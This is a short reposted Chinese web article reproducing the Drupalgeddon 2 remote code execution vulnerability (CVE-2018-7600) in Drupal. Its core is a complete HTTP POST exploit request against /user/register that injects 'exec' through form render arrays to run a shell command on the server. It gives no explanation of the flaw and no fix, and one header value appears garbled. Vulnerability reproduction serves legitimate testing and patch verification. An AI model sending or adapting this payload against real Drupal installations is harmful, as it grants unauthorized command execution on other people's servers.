Drupal Drupalgeddon 2远程执行代码漏洞(CVE-2018-7600)(drupal是什么)

网友投稿 302 2022-10-09


Drupal Drupalgeddon 2远程执行代码漏洞(CVE-2018-7600)(drupal是什么)

漏洞复现:1.参考a2u / CVE-2018-7600,我们可以向drupal发送以下请求:POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1Host: your-ip:8080Accept-Encoding: gzip, deflateAccept: /Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/x-103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id


版权声明:本文内容由网络用户投稿,版权归原作者所有,本站不拥有其著作权,亦不承担相应法律责任。如果您发现本站中有涉嫌抄袭或描述失实的内容,请联系我们jiasou666@gmail.com 处理,核实后本网站将在24小时内删除侵权内容。

标签:代码
上一篇:Drupal 远程代码执行漏洞(CVE-2018-7602)(drupal开发)
下一篇:【运维安全】- BurpSuite/Fiddler简介03
相关文章

 发表评论

暂时没有评论,来抢沙发吧~